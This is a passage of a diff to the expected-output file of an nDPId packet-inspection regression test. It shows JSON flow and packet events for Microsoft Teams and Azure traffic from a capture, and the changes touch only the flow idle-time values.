{"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687745,"flow_last_seen":1587041687745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2261,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1587041687745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGienAqAEGNKm6d+yTAbth0wzHAAAAALAC\/\/81+QAAAgQFtAEDAwUBAQgKMITCxwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410} 
@@ -348,39 +348,39 @@ 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1587041690915,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":301,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":301,"pkt_l4_len":267,"thread_ts_msec":1587041690915,"pkt":"KDc3AG3IEBMx8Tl2CABFAAEfVLxAADkRaLrAqAEBwKgBBgA1+boBCwAAeGqBgAABAAUAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQABwAwABQABAAAACgAuHWFwcGxpY2F0aW9uaW5zaWdodHNfaW5nZXN0aW9uB21vbml0b3IFYXp1cmXALcBCAAUAAQAAAJEALB1hcHBsaWNhdGlvbmluc2lnaHRzX2luZ2VzdGlvbgtwcml2YXRlbGlua8BgwHwABQABAAAAXwAXAmRjDnRyYWZmaWNtYW5hZ2VyA25ldADAtAAFAAEAAAAeABwQY2ZyLWJyZWV6aWVzdC1pbghjbG91ZGFwcMDGwNcAAQABAAAABwAEKE+KKQ=="} 
00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2318,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041690880,"flow_last_seen":1587041690915,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1587041690915,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.79.138.41"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690916,"flow_last_seen":1587041690916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041690916,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2319,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1587041690916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041690916,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyUAbup7MP+AAAAALAC\/\/9nAwAAAgQFtAEDAwUBAQgKMITPEwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041690946,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GwdAAG4GfY4oT4opwKgBBgG77JSCI5UvqezD\/6ASIAArFwAAAgQFoAEDAwgEAggKUvjCpTCEzxM="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041690946,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyUAbup7MP\/giOVMIAQEAlpqQAAAQEICjCEzzFS+MKl"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2322,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041690916,"flow_last_seen":1587041690946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041690946,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1587041691075,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1587041691075,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZLy0AAP8RCQ\/AqAEGwKgBAfWPADUARdrUdPIBAAABAAAAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAQ=="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691075,"flow_last_seen":1587041691075,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041691075,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1587041691148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1587041691148,"pkt":"KDc3AG3IEBMx8Tl2CABFAACQrGdAADkREZ7AqAEBwKgBBgA19Y8AfAAAdPKBgAABAAIAAAAABGVtZWECbmcDbXNnDHRlYW1zLW1zZ2FwaQ50cmFmZmljbWFuYWdlcgNuZXQAAAEAAcAMAAUAAQAAADwAGw9tc2dhcGktcHJvZC1zZnIIY2xvdWRhcHDANMBJAAEAAQAAAAoABDRybAg="} 
00814{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2351,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041691148,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"emea.ng.msg.teams-msgapi.trafficmanager.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.108.8"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041691149,"flow_last_seen":1587041691149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041691149,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2352,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1587041691149,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041691149,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG2I\/AqAEGNHJsCOyVAbumbhw9AAAAALAC\/\/8jXgAAAgQFtAEDAwUBAQgKMITP9QAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 